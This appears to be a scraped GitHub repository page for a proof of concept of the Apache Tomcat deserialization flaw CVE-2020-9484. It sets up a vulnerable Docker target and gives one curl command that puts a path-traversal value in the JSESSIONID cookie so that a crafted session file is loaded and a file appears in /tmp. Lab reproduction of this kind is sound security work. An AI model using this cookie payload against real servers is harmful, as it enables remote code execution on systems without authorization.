Skip to content

POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Notifications You must be signed in to change notification settings

freeFV/CVE-2020-9484

 
 

Repository files navigation

Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Vulnerable target setup

  • Clone this repository
  • Run docker-compose up -d
  • That's it !

Exploit POC

  • Run curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx

poc

  • File named coldfx gets created in tmp directory

About

POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 100.0%